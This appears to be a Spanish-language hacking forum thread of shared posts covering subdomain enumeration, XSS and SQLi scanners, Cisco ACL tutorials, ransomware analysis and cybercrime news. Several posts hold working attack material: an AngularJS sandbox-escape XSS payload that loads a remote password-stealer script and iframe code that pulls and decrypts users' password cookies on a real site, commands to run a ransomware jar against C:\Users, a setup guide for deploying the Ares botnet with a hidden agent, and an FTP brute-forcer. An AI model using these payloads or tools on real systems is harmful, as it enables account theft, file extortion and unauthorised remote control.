Una vez que el clon recursiva ha completado, la construcción de la SDK-esp-abierta (asegúrese de que la construcción de la versión independiente!). usuarios de OS X FAVOR que este paso se debe realizar en un sistema de archivos entre mayúsculas y minúsculas!

Código: text
  cd esp-open-sdk
  make STANDALONE=n

Una vez que el SDK-esp-abierto ha recopilado, en el directorio de nivel superior, hacer:
Código: text
wget --content-disposition "http://bbs.espressif.com/download/file.php?id=1046"

Código: text
 unzip ESP8266_NONOS_SDK_V1.5.1_16_01_08.zip


Si tienes OS X, es probable que necesites instalar GNU sed, y asegúrese de que está en su PATH. Una manera fácil de hacer esto es usar Homebrew:

Código: text
brew install gnu-sed

Código: text
export PATH="/usr/local/opt/gnu-sed/libexec/gnubin:$PATH"


Como alternativa, para garantizar que siga siendo accesible después de que finalice la sesión, y para evitar errores extraños en futuras versiones, agregarlo a su perfil de golpe.

Si se encuentra con esto, asegúrese de ejecutar "make clean" para eliminar los artefactos rotos, antes de tratar de construir de nuevo.
En esta etapa, usted debe ser capaz de cambiar al directorio esp-VNC, y ejecutar make para construir el firmware ESP8266.

Código: text
 cd esp-vnc
make


Descargar la herramienta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



fuente:n0where.net



Un saludo biachees :)
#11
Buenas queria compartiros esta herramienta llamada Sublist3r.


Descripcion

Sublist3r es herramienta desarollada en python que está diseñado para enumerar los subdominios de sitios web a través de diversas fuentes de OSINT. Ayuda en lasa pruebas de penetración a recoger y reunir los subdominios del dominio que se dirigen. Sublist3r soporta varios motores de búsqueda como Google, Yahoo, Bing, Baidu, y Ask. Más motores de búsqueda se pueden añadir en el futuro. Sublist3r también recopila subdominios utilizando Netcraft, VirusTotal, ThreatCrowd, DNSdumpster y PassiveDNS.

subbrute se integró con Sublist3r para aumentar la posibilidad de encontrar más subdominios utilizando fuerza bruta con una lista de palabras mejorada.

Instalacion

Descargamos la herramienta de github


Deberemos instalar las dependencias: argparse,dnspython,requests.Para ello ejecutamos el siguiente comando.

Código: text
pip install -r requirements.txt


Opciones y Uso

                     OPCIONES

-d   --domain           Especificar el nombre del domino
-b   --bruteforce   Habilitar el modo subbrute force
-p   --ports           Analizar los subdominios que se encuentra en un determinado puerto
-v   --verbose           Activa el modo detallada y lo visualiza en tiempo real
-t   --threads           Numero de hilos para subbrute force
-e   --engines           Especifica los motores de busqueda
-o   --output           Guarda los resultados en un archivo
-h   --help           Muestra el menu de ayuda


Resultado



Quizas os sirva a alguno :) Un saludo biachees :P :O 
#12
Redes y antenas / Antispoofing con ACLs
Enero 10, 2017, 08:57:34 AM
Haciendo referencia al No tienes permitido ver los links. Registrarse o Entrar a mi cuenta destacamos una tecnica llamada anti-spoofing.

Las ACLs pueden ser utilizadas para mitigar amenazas en la red como ataques de suplantacion de direcciones IP y ataques de denegacion de servicio (DoS).

La mayoria de los ataques usan algun tipo de suplantacion, la suplantación de direcciones IP anula el proceso normal de creación de paquetes insertando en un encabecero IP
personalizado con una dirección IP de origen diferente.

Hay muchas clases conocidas de direcciones IP que nunca deben ser vistas como direcciones IP de origen para el tráfico que ingresa a la red de una organización.

Por ejemplo, en la imagen, la interfaz S0/0/0 está conectada a Internet y nunca debe aceptar paquetes entrantes desde las siguientes direcciones:

-Todas las direcciones 0.0.0.0
-Direccion de broadcast
-Local host (127.0.0.1/08)
-Rangos multiples de IP(224.0.0.0/4)



La red 192.168.1.0/24 está conectada a la interfaz R1 G0 / 0. Esta interfaz sólo debe permitir que los paquetes entrantes con una dirección de origen de esa red. La ACL para G0 / 0 que aparece en la figura sólo permitirá paquetes entrantes de la red 192.168.1.0/24. Todos los demás serán descartados.



documentacion:cisco

#13
INTRODUCCIÓN A LAS ACL(LISTAS DE CONTROL DE ACCESO)

Las ACL(listas de control de acceso) son usadas en las redes para prevenir ataques y controlar el trafico de la red.
Los sysadmin pueden utilizar ACLs para definir y controlar el trafico de los dispositivos que están en la red para intentar securizarlos.

Las ACLs pueden ser definidas mediante un numero, ese numero dispone de un rango entre 200-299 que sera usado para controlar el trafico según el tipo Ehernet.El rango entre 700-799 deberá indicar como esta clasificado el trafico mediante su dirección MAC.

CONFIGURACION DE ACLs

Una ACL es una lista de sentencias que permiten o deniegan un estado,conocido como entradas de control de acceso(ACEs).
Las ACEs pueden ser creadas para filtrar trafico basándose en ciertos criterios como: la dirección de destino, la dirección de origen, el protocolo y el numero de puerto.

Las ACLs Estandars marcan los paquetes examinando la dirección IP de la cabecera IP del paquete.
Aquellas ACLs son usadas para filtrar paquetes basados tan solo en la información de la capa 3.Para configurar un numero de una ACL Estandar lo haremos mediante el siguiente comando.

Código: text
access-list (acl-#) ([b]permit[/b] | [b]deny[/b] | [b]remark[/b]) source-addr (source-wildcard) [b]log[/b]


           Parámetro                           Descripción

-acl-#                       Esto es un numero decimal entre 1 y 99, o 1300 a 1999   
-deny                        Deniega el acceso si las condiciones  están marcadas
-permit                     Permite el acceso si las condiciones están marcadas 
-remark                    Agregar un comentario sobre las entradas en una lista de acceso IP para hacerlas mas fáciles de entender y escanear.

-source-addr         Numero de red o de host el cual el paquete sera enviado.
-source-wildcard   (opcional) 32-bit mascara wildcard sera aplicado en el origen.
-log                     (opcional) Recoge informacion sobre los mensajes de logging.

Las ACLs Extendidas marcan los paquetes basandose en la informacion de las capas 3 y 4 de origen y destino.
La Capa 4 puede incluir protocolos de informacion como TCP y UDP. Las ACLs Extendidas proporcionan gran flexibilidad y control sobre el acceso a una red mas que las ACLs Estandars. Para configurar un numero de una ACL Extendida usaremos el siguiente comando.

Código: text
access-list acl-% ([b]permit | deny | remark[/b]) protocol source-addr (source-wildcard) dest-addr (dest-wildcard) (operator port) [b]established[/b]


           Parámetro                           Descripción

-acl-#                       Esto es un numero decimal entre 1 y 99, o 1300 a 1999   
-deny                        Deniega el acceso si las condiciones  están marcadas
-permit                     Permite el acceso si las condiciones están marcadas 
-remark                    Agregar un comentario sobre las entradas en una lista de acceso IP para hacerlas mas fáciles de entender y escanear.
-protocol                     Nombre o numero de un protocolo.
-source-addr               Numero de red o de host el cual el paquete sera enviado.
-source-wildcard          Bits de la wildcard seran aplicados a la direccion de  origen
-destination-adrr         Numero de la red o host el cual el paquete sera enviado
-destination-wildcard   Bits de la wildcard seran aplicados a la direccion de destino

-operator                    (optional) Compara el origen o direccion de los puertos. Incluye posibles operandos como lt (menor que) gt (mayor que) eq (igual) neq (no igual) and range (incluyendo un rango).
-port                            (optional)Numero de puerto o nombre de un puerto TCP o UDP
-established                  (optional)


En lugar de utilizar un número, se puede utilizar un nombre para configurar una ACL.Para configurar una ACL estandar o extendida usaremos el siguiente comando.

SINTAXIS PARA LLAMAR A UNA ACL

Router(config)#
Código: text
[b]ip access-list (standard | extended)[/b] nombre_de_la_ACL


Configurar Entradas de control de acceso(ACEs)

Router(config-std-nacl)#
Código: text
([b]permit | deny | remark[/b]) (source (source-wildcard) | [b]any)[/b]

Sintaxis ACE Estandar

Router(config-ext-nacl)#
Código: text
 (permit | deny | remark) protocl source-addr (source-wildcard) dest-address (dest-wildcard) (operator-port)

Sintaxis ACE Extendida


documentacion:cisco


#14

Un XSS reflejado a través de bypass hace que la exposición de la contraseña de los usuarios del McDonald

McDonalds.com contiene una página de búsqueda que refleja el valor del parámetro de búsqueda ( q) en la fuente de la página. Así que cuando buscamos en la ***********-test-reflected-test-***********que se verá así:


Enlace utilizado:
Código: text
 https://www.mcdonalds.com/us/en-us/search-results.html?q=***********-test-reflected-test-***********


McDonald utiliza AngularJS para que podamos tratar de imprimir el ID de ámbito único usando el valor de búsqueda. Podemos hacer esto cambiando el qvalor del parámetro a {{$id}}. Como podemos ver {{$id}}consigue convertido a 9la ID única (monótonamente creciente) del alcance AngularJS.


Enlace utilizado:
Código: text
 https://www.mcdonalds.com/us/en-us/search-results.html?q={{$id}}


Utilizando {{alert(1)}}como valor no funcionaría porque todo el código AngularJS se ejecuta en un entorno limitado. Sin embargo, la caja de arena AngularJS no es muy seguro. De hecho, no se debe confiar en absoluto. Llegó incluso eliminado en la versión 1.6 ( fuente ) porque le dio una falsa sensación de seguridad. PortSwigger creado un buen post sobre escapar de la caja de arena AngularJS ( enlace ).

Primero tenemos que encontrar la versión de AngularJS No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Podemos hacer esto mediante la ejecución angular.versionen la consola.


La versión es 1.5.3, por lo que la caja de arena de escape que necesitamos es
Código: text
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
. Podemos utilizar este escape caja de arena como valor de búsqueda, lo que resulta en una alerta.


Incluso podemos cargar archivos JavaScript externos utilizando la siguiente caja de arena de escape, lo que da lugar a la alerta a continuación.

Código: text
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/external-alert.js`)');}}`


El código JavaScript se puede cargar desde otro dominio desde McDonalds no excluye que el uso de la Content-Security-Policycabecera.


Robar la contraseña del usuario

Otra cosa que me di cuenta en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta era su cartel en la página que contenía una casilla muy especial. Normalmente se puede comprobar "Recuérdame" en el momento de firmar, pero de signo de McDonald en la página nos da la opción de recordar la contraseña.


He buscado en todo el JavaScript de la palabra clave passwordy me encontré con algo de código interesante que descifra la contraseña.


Si hay una cosa que no debe hacer, es descifrar contraseñas lado del cliente (o incluso almacenar contraseñas mediante el cifrado de dos vías).

Traté de ejecutar el código de mí mismo, y funcionó!


McDonald utiliza CryptoJS para cifrar y descifrar datos sensibles. Utilizan el mismo keyy ivpara todos los usuarios, lo que significa que sólo tengo que robar la penccookie para descifrar la contraseña de alguien.


He intentado descifrar la contraseña en la página de búsqueda usando una carga útil maliciosa de búsqueda, pero no funcionó. De alguna manera, las cookies no contienen caracteres ocultos en la página de búsqueda haciendo que el getCookiemétodo falle. El getCookiemétodo intenta recortar espacios en blanco de los valores de cookie. En las imágenes se puede ver a continuación .charAt(0)devuelve una cadena extraña cuando se ejecuta en la página de búsqueda.


Escribí algo de JavaScript que carga la página en un iframe y le quita la cookie de ese iframe.

Código: text
if (!window.xssIsExecuted) {
    window.xssIsExecuted = true;

    var iframe = $('<iframe src="https://www.mcdonalds.com/us/en-us.html"></iframe>');
    $('body').append(iframe);

    iframe.on('load', function() {
        var penc = iframe[0].contentWindow.getCookie('penc');
        alert(iframe[0].contentWindow.decrypt(penc));
    });
}


Ahora podemos utilizar la siguiente caja de arena de escape, lo que se traduce en mi contraseña en un cuadro de alerta!

Código: text
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/mcdonalds-password-stealer.js`)');}}





fuente:finnwea.com



Un saludo biachees :)
#15
Análisis y desarrollo de malwares / JavaRansomware
Enero 04, 2017, 02:52:19 PM
¿Qué hace ransomware?

Hay diferentes tipos de ransomware. Sin embargo, todos ellos se evitará el uso de su PC normalmente, y todos ellos le pedirá que hacer algo antes de poder utilizar su PC. Ellos pueden dirigirse a cualquier usuario de PC, ya sea un ordenador personal, los puntos finales en una red de empresa, o los servidores utilizados por una agencia gubernamental o profesional de la salud. Ransomware puede:

-Impedir el acceso de Windows.

-Cifrar archivos por lo que no pueden utilizarlos.

-Detener ciertas aplicaciones se ejecuten (como el navegador web).

Ransomware exigirá que pague el dinero (un "rescate") para tener acceso a su PC o archivos. También hemos visto que te hagan encuestas completas. No hay garantía de que el pago de la multa o hacer lo que el ransomware dice qué le dará acceso a su PC o archivos de nuevo

JavaRansomware

Este proyecto tiene como objetivo construir un cripto-ransomware casi funcional para propósitos educativos, escrito en Java puro. Básicamente, se cifrará sus archivos en segundo plano usando un algoritmo AES-256, un fuerte algoritmo de cifrado, utilizando RSA-4096 de clave pública para asegurar la clave AES Symetric y almacenarla en una base de datos embeeded.

El software malicioso cifrar con la clave pública RSA-4096 antes de enviar cualquier carga útil a continuación, al servidor. Este enfoque con el transporte https juntos hacen la seguridad y la autenticación casi irrompible (en teoría).

Uso y cómo funciona

La forma más fácil de ejecutar este proyecto es utilizar el del .jar abrir un terminal cmd y sólo tiene que ejecutar los siguientes comandos

Código: text
 $ cd JarPath


Cifrar todos los archivos

Código: text
$ java -jar JavaRansomware.jar C:\Users Encrypt


Descifrar todos los archivos

Código: text
$ java -jar JavaRansomware.jar C:\Users Decrypt


Puedes descargar el proyecto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un saludo:)
#16
Linux Kodachi es un sistema operativo basado en Debian 8.6 con un escritorio ligero XFCE que pretende ser lo más seguro, anti-forense y anónimo posible, siendo a la vez muy fácil de usar. Todo lo que hay que hacer es arrancarlo mediante una unidad externa (dispositivo USB, tarjeta SD o CD/DVD) y tendremos un sistema operativo funcionando con conexión VPN + conexión Tor y servicio DNScrypt. En principio no requiere ninguna configuración o conocimiento de Linux.


El sistema operativo se carga en RAM por lo que una vez que se apague el PC no se dejará ningún rastro eliminado todas las actividades del usuario.
Es libre bajo licencia Apache License 2.0 y de código abierto y sus características principales son:

- VPN, Tor y DNScrypt.
- Truecrypt
– keepass
– Secure cloud y mucho más
- Generador de direcciones MAC aleatorias
- RAM Wiping en el reinicio/apagado
- Navegador Tor
- Pidigin Messenger
- Carteras Bitcoin y Litecoin
- Opciones multi-DNS
- Truecrypt/VeraCrypt
- Peer Guardian
- Información del sistema y de la seguridad en el escritorio

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:  (usuarios por defecto: kodachi y root, contraseña: r@@t00)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


fuente:hackplayers.com

Un saludo :)
#17
Hacking / BruteXss-Herramienta para detectar XSS
Enero 03, 2017, 07:16:45 AM
Buenas queria compartir esta herramienta llamada BruteXSS.


Descripcion

Es una herramienta la cual nos permite identificar vulnerabilidades XSS mediante una ataque de fuerza bruta que lo implementa en un diccionario, en ese diccionario nosotros podremos añadir mas vectores para el futuro escaneo,implementa los parametros POST y GET.
La herramienta la podreis encontrar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Caracteristicas

-XSS fuerza bruta
-Escaneo XSS
-Soporta peticiones GET / POST
-Personalizar wordlist
-Intefaz facil de usar

Requisitos

-Python 2.7
-Diccionario (wordlist.txt)
-Módulos necesarios: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ejemplo





Un saludo :)


#18
Buenas gente estaba tratando de instalar una herramienta llamada webxploiter para poder compartirla con ustedes pero parece ser que soy incapaz :(

Error cuando trato de ejecutar la tool

He buscado por google el error y nada no soy capaz de ponerla en funcionamiento ya que siempre me arroja el mismo error, se lo comente a un chico del grupo y me dijo que probara en linux, me fui a kali, y bueno peor aun me saltaron mas errores

La herramienta tiene un archivo que para instalarla la herramienta y hacerla funcionar hay que ejecutar el script, pero yo obviamente no podia instalarlo de esa manera porque lo estaba realizando en windows, asique fui a instalar las dependencias y requerimientos manualmente


Me parece una tool interesante si alguien se anima y la prueba a instalar por su cuenta o me puede ayudar con el error le estare agradecido :)

Un saludo

#19
Wargames y retos / 10 mejores recursos para practicar
Diciembre 30, 2016, 08:55:11 AM
Buenas queria compartir estos 10 sitios donde practicar hacking.

Pentestit

Este conjunto de laboratorios se destaca por su realismo: no son solo excelentes desafíos, sino que sus escenarios son muy similares a los que podemos encontrar en un entorno corporativo. En Pentestit la conexión se realiza a través de una VPN y está limitado de forma gratuita a algunos pocos niveles o vulnerabilidades. Sin embargo, si estás pensando en certificar algún curso de ethical hacking práctico o te dedicas a las auditorías de seguridad de manera profesional, quizá puedas invertir cierto dinero para reforzar tus conocimientos.


W3Challs

Bautizado por sus siglas provenientes de World Wide Web Challenges, este portal ofrece desde 2010 diversos desafíos con temáticas relacionadas a hacking, wargames, forense, criptografía y programación. Curiosamente, también te desafían a hackear su propio sitio, pero sin aplicar técnicas de fuerza bruta o Denegaciones de servicio. Soporta dos idiomas: inglés y francés.


Rootme

Este portal cuenta con más de 200 retos y 1650 soluciones para ponerte a prueba. Como se puede ver en la siguiente captura, podrás entrenarte en distintos desafíos de seguridad y en español, entre otros idiomas disponibles. Según los creadores de Rootme, ya han superado los 68.000 estudiantes y muchos de ellos participan diariamente de las comunidades formadas para cada tópico, por lo que podrán ser de gran ayuda.


OverTheWire

Posee múltiples escenarios como Bandit, Natas y Narnia, entre otros con distintos obstáculos. Algo que llama curiosamente la atención de OverTheWire es que si eres novato en este submundo de las auditorías de seguridad informática encontrarás varios escenarios diseñados para ti.


Hackthissite

Este sitio también te permite probar herramientas o conocimientos de hacking de manera gratuita y legal. Además, Hackthissite ofrece una comunidad activa en donde se desarrollan distintas temáticas relacionadas: hay desafíos de aplicaciones, programación, forense e inclusive de estenografía.


Hacking-Lab

Ofrece desafíos del tipo CTF desde su plataforma, en la que cualquiera puede participar; solo hace falta registrarse con una cuenta gratuita, configurar una VPN y comenzar a explorar lo que ofrecen. La meta de Hacking-Lab es aumentar la concientización hacia una mayor educación y ética en la seguridad de la información a través de distintos desafíos que abarcan informática forense, criptografía, ingeniería inversa y, por supuesto, hacking ético.


Exploit-exercises

Este portal provee cinco escenarios virtuales, documentación y desafíos que pueden utilizarse para aprender sobre explotación de vulnerabilidades. Testeando escalamiento de privilegios, análisis de vulnerabilidades, desarrollo de exploits, depuración e ingeniería inversa deberás avanzar sobre los desafíos que propone Exploit-exercises.


Hack This

Esta gran plataforma te permitirá sumar determinada cantidad de puntos resolviendo escenarios muy distintos y con un variable grado de dificultad. Además, en Hack This podrás encontrar artículos, foros y un chat para conseguir una cálida ayuda en caso de que lo necesites.


Enigma Group

Ya desde 2003 Enigma Group trabaja sobre la concientización de seguridad en aplicaciones web, por lo cual podrás probar todo tipo de vulnerabilidades del top ten de OWASP. Sin embargo, como ves en la siguiente imagen, existen muchos otros escenarios posibles. También encontrarás muchas guías de estudio y bases de datos de exploits o hashes.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Además de contener múltiples desafíos en bastas categorías, el portal No tienes permitido ver los links. Registrarse o Entrar a mi cuenta te desafía a que puedas sociabilizar con otros colegas o curiosos que disfrutan tanto como tú de la seguridad informática.





fuente:welivesecurity.com
#20
Análisis y desarrollo de malwares / Ares-Python Botnet
Diciembre 29, 2016, 05:54:26 PM
Buenas gente os queria compartir aqui al amigo Ares :)

Descripcion

Ares es una herramienta de acceso remoto compuesta por un panel de control donde podremos interaccionar con los bots.
El cliente es un programa escrito en python el cual puede ser compilado como un ejecutable win32 usando No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Instalacion

Código: text
git clone https://github.com/sweetsoftware/Ares 

Una vez descargado el repositorio pasaremos a instalar las dependecias
Citarpip install pythoncom
pip install pyhook
pip install PIL
pip install requests

A continuacion configuraremos el agente de la manera que queramos, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Nos dirigimos a la ruta Ares/agent/python/settings.py

configurando

Este fichero contiene lo siguiente:

-SERVER_URL = URL del servidor http
-BOT_ID = el nombre (singular) del bot
-DEBUG =  imprimir mensajes de depuración en la salida estándar
-Idle_time = tiempo de inactividad antes de entrar en el modo de espera.
-REQUEST_INTERVAL = intervalo entre cada consulta a la CNC cuando se activa
-PAUSE_AT_START = tiempo de espera antes de contactar con el servidor cuando se inicie (en segundos)
-AUTO_PERSIST = por defecto el agente es persistente

fichero de configuracion del server

Una vez todo en orden pasaremos a instalar el server, primero debemos crear la base de datos SQLite

Código: text
cd server
python db_init.py


Si no esta instalado el paquete cherrypy deberemos instalarlo
Código: text
pip install cherrypy

Bien, a continuacion iniciaremos el server, python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por defecto el servidor escucha en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Por ultimo utlizaremos PyInstaller para compilar el agente en un unico archivo EXE:

Código: text
cd agent
PyInstaller --onefile --noconsole agent.py


Recuerden que deberemos iniciar el server y la bbdd antes de lanzar el script.

Aqui deberemos establecer un pass para el CP :)


Mediante el fichero No tienes permitido ver los links. Registrarse o Entrar a mi cuenta conseguiremos el bot, yo lo que he hecho ha sido ejecutarlo desde la consola

Panel de Control

Nos da una shell, no es muy molona pero bueno :(



Bueno hasta aqui Art Attack espero que os sirva a alguno :)

Un saludo biacheees :)



#21
Hacking / Whitewidow- Escáner de vulnerabilidades SQLi
Diciembre 25, 2016, 10:03:38 AM
Buenas gente os queria compartir esta herramienta llamada Whitewidow.


Descripcion

Whitewidow es un escáner de vulnerabilidades SQL automático y de código abierto, capaz de lanzarse contra una lista de sitios contenidos en un archivo, o bien buscar en Google sitios web potencialmente vulnerables. Permite el formateo automático de archivos, agentes de usuarios aleatorios, direcciones IP, información de servidor, múltiples sintaxis de inyección de SQL, capacidad para iniciar sqlmap desde el programa y un entorno amigable.

Instalacion

Código: text
git clone https://github.com/WhitewidowScanner/whitewidow


Nos dirigimos a la carpeta whitewidow y ejecutamos bundle install

instalando las gemas

Uso

whitewidow.rb -h Para ver las opciones que tiene la herramienta

opciones

Whitewidow dispone de una opcion que permite realizar una busqueda de sitios vulnerables, esa opcion es la "d", whitewidow.rb -d

resultado

Whitewidow dispone de una opcion para realizar spidering para sacar todos los enlaces disponibles, esa opcion es la "s" whitewidow.rb -s

ejemplo



Quiero decir que la herramienta no es perfecta algun falso positivo da
Espero que os pueda servir
Un saludo biachees :)
#22
Hacking / Dnstwist
Diciembre 21, 2016, 10:06:03 AM
Buenas queria compartir esta herramienta, se llama Dnstwist.

Descripcion

Dnstwist genera una lista de dominios potenciales de phishing y luego comprueba para ver si están registrados. Además, puede comprobar si el servidor de correo de registro MX se puede utilizar para interceptar e-mails mal dirigidos y puede generar hashes erroneos de las páginas web para ver si son sitios de phishing funcionando.

Caracteristicas

-Amplia gama de algoritmos eficientes de fuzzing de dominio
-Nombres de dominio internacionalizados (IDN)
-Resuelve los nombres de dominio a IPv4 e IPv6
-Realiza consultas de NS y registros MX
-Evalúa la página web similitud con los hashes difusos para encontrar sitios de phishing
-Genera variantes de dominio adicionales que utilizan archivos de diccionario
-información de ubicación GeoIP
-Captura HTTP y servicios SMTP
-Realiza operaciones de búsqueda WHOIS para la creación y modificación de la fecha
- Puedes exportarlo en formato CSV y JSON

Instalacion

Yo lo he instalado en Windows.

Código: text
git clone https://github.com/elceef/dnstwist 

Código: text
c:\python27\python.exe -m pip install -r requirements.txt


Uso

-h, --help              muestra el menu de ayuda
-a, --all                 muestra todos los DNS
-b, --banners          determinar HTTP y SMTP
-c, --csv                 exportar en formato csv
-d FILE, --dictionary FILE  genera un diccionario para utilizarlo en los dominios
-g, --geoip               GeoIP localizacion
-j, --json                  exportar en formato json
-m, --mxcheck          comprueba si el host MX puede ser usado para interceptar e-mails
-r, --registered          muestra solo los nombres de dominio registrado
-s, --ssdeep              Busca las webs y compara los hashes
-t NUMBER, --threads NUMBER empieza un numero de hilos especificos (por defecto: 10)
-w, --whois               realiza un whois
--nameservers LIST   Lista los nombre de los servidores separados por comas
--port PORT              especificar el puerto de escucha

Ejemplo

si observais en la parte de la izquierda la herramienta identifica cual es el dominio original




Un saludo biacheesss

#23
Hacking / FTP Password Recovery
Diciembre 16, 2016, 11:17:19 AM
Buenas gente os queria compartir esta herramienta llamada FTP Password Recovery.

Descripcion

FTP Password Recovery es una herramienta en línea de comandos libre para encontrar la contraseña perdida u olvidada FTP para cualquier servidor FTP. (vamos para realizar ataques de FB)
Detecta automáticamente si el servidor FTP de destino permite que cualquier Anónimo (sin contraseña). En caso de que el servidor FTP se ese ejecutando en un puerto diferente que no sea el puerto 21, entonces se puede especificar fácilmente el mismo en la herramienta junto con la dirección IP del servidor. 

Caracteristicas

-Herramienta gratuita para recuperar la contraseña perdida u olvidada FTP (para realizar ataques FB)
-Tiene una opción para especificar el puerto FTP no estándar
-Detecta automáticamente cualquier usuario anónimo
-Incluye un diccionario de las contraseñas que tienen los FTP mas comunes
-Copia el recuperado contraseña FTP al portapapeles
-Incluye instalador para la instalación y desinstalación local

Instalacion

-Descargaremos la herramienta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (abajo Download FTP Password Recovery)
-Una vez que tengamos descargado el zip nos dirigimos a la carpeta y ejecutamos en la consola Setup_FTPPaswordRecovery.exe , se nos abrira el instalador de la herramienta, tan solo tendremos que seleccionar la ruta de donde la queremos instalar y listo

Uso

Es muy facil de usar, con la opcion:
-i elegiremos la IP
-p especificaremos el puerto
-u el usuario
-f la ruta de nuestro diccionario

probando la herramienta en un ftp mio

resultado

Espero que os haya gustado

Un saludo biaaachees :)



fuente:kitploit.com



#24

MalwareHunterTeam ha descubierto una nueva variante de ransomware bastante curiosa. En ElevenPaths han analizado las nuevas versiones mejoradas que cometen varios errores interesantes, entre ellos, el que permite conocer su contraseña de descifrado. Esta muestra llama la atención porque en teoría ofrece dos fórmulas para descifrar los ficheros: o bien pagando, o bien si el propio infectado consigue infectar a dos o más personas que paguen el rescate.

La funcionalidad básica es la de siempre: se cifran un buen montón de ficheros según su extensión, y se pide un rescate por ello de 1 bitcoin (por encima de la media que se suele exigir habitualmente).

Lo que hace nuevo este ransomware, es ofrecer dos vías para descifrar el contenido: La vía "normal" en la que se paga un rescate, y la vía "nasty" (así la denominan ellos mismos) en la que si se envía un enlace a un ejecutable a dos personas, se infectan y pagan, se te dará un código "gratis" para poder descifrar tu contenido.

Un "plan amigo" de difusión en la que el atacante se "asegura" dos infecciones por el precio de una, y un método de difusión más eficaz, puesto que las víctimas elegidas por el usuario infectado siempre estarán más predispuestas a ejecutar el enlace de un conocido. Otra cosa es que pague (supuesta condición para que se aplique el "descuento").

También destacar que el ransomware apela a la sensibilidad de la víctima, asegurando que el dinero irá para una buena causa: paliar los efectos de la guerra de Siria. Se ha llamado "popcorn" porque la primera versión utilizaba el dominio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero ya no es así en las últimas versiones.

La contraseña

Si se desemsambla el código con ILSpy por ejemplo, se puede observar la línea que contiene la contraseña en Base64. Una rápida decodificación nos permitirá obtener la contraseña y los datos de vuelta. No hemos creado una herramienta específica para conseguirlo porque es más que probable que el atacante cambie rápidamente su estrategia y además, no parece un malware muy avanzado por ahora ni difundido (si alguien está infectado, que nos contacte, por favor). De hecho, el día anterior la contraseña de sus primeras versiones era siempre "123456". 

Como se ha mencionado, la contraseña se supone (junto con el resto de variables) incrustada por el servidor en el momento de creación del ejecutable. Tras el análisis que hemos realizado, resulta ser un hash MD5 del que aún no conocemos a qué responde. El hash MD5 está triplemente codificado con Base64 en el código.

El resultado de la decodificación es la contraseña que se puede introducir en el diálogo correspondiente para descifrar los datos sin necesidad de pagar.

El plan amigo

Lo que más ha llamado la atención es el "nasty way" para descifrar los archivos. Se supone que si se envía a dos conocidos el enlace ejecutable y estos pagan, se te dará el código de desbloqueo. Muy inteligente para obtener una rápida expansión, pero creemos que falso. El código no contiene ninguna instrucción para comprobar que esto ocurre automáticamente. A no ser que toda la inteligencia corra del lado del servidor (cosa que dudamos) no podemos garantizar (ni hemos evidenciado técnicamente que ocurra) que esto sea así y por tanto tiene muchas más posibilidades de tratarse de un simple bulo para esparcir más el malware.

De hecho, los ejecutables generados no contienen información sobre quién los ha recomendado en su interior, solo el hecho de ser creados bajo una URL que sí contiene el ID de la víctima inicial... pero observando toda la tramoya del sistema, su mala programación, las promesas no cumplidas (cuentas atrás amenazantes que finalmente no borran nada...), lo inestable de su infraestructura y "artesanía" en general, la navaja de Ockham nos inclina pensar que todo es falso, y no existe ningún mecanismo para controlar esto.


fuente:blog.segu-info.com.ar

#25

Una investigación realizada en más de una docena de países de Estados Unidos y Europa acaba con la detención de 34 personas por haber llevado a cabo ataques de denegación de servicio.

Treinta y cuatro personas, entre ellas varios adolescentes, han sido detenidas en una macrooperación policial a escala internacional. ¿El motivo de los arrestos? Haber provocado la suspensión o daños de gravedad a diversos servicios online mediante ataques de denegación de servicio (DDoS, por sus siglas en inglés).

Se sospecha que estos sujetos habrían empleado un software llamado Netspoof para derivar grandes volúmenes de tráfico hacia determinados sitios o servidores web, con el objetivo de colapsar en un breve espacio de tiempo la capacidad de los sistemas y, finalmente, lograr que el servicio quede inutilizable.

Las detenciones se realizaron en trece países entre los pasados cinco y nueve de diciembre; 12 de ellas dentro del Reino Unido a partir de una investigación llevada a cabo por la Agencia Nacional contra el Crimen (NCA). De todos ellos, un hombre escocés de 27 años ha sido ya acusado de varios delitos cibernéticos, según informa la BBC.


Igual suerte ha sufrido Sean Sharma, un estudiante universitario de 26 años de California, quien ha sido arrestado y acusado por un ataque DDoS que provocó la caída de un servicio de chat basado en San Francisco. La fiscalía podría pedir para Sharma hasta 10 años de prisión, aunque la investigación aún está bajo el mando del FBI.

Pero quizás lo más sorprendente de esta redada digital es que, pese a la enorme cantidad de detenidos, las policías de los distintos países llegaron a entrevistar y advertir a más de 100 sospechosos de estar detrás de multitud de ataques DDoS. Una investigación de extraordinaria envergadura en la que el Centro Europeo de Delitos Cibernéticos de la Europol ha sido una pieza fundamental.



fuente:ticbeat.com


#26
buenas gente trataba de instalar wpscan en windows y vaya menuda movida jajaja xD el caso es que me tira un error diciendome que no encuentra libcurll.dll y he estado buscando por internet y tal y me dicen que copie el libcurll.dll al directorio bin de ruby.


copio y pego el libcurll.dll pero me tira el error de que no lo encuentra

he seguido estas fuentes:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¿Alguna sugerencia?

Un saludo biaches
#27

Una sola orden judicial le bastó al FBI para acceder a ocho mil ordenadores en 120 países

En enero de este año el FBI llevó a cabo una operación contra los usuarios de una web de pornografía infantil en la Dark Web, utilizando un método sin precedentes hasta ese momento: un elemento de malware colocado en el servidor que les permitía obtener las direcciones IP de quienes visitaban la web.

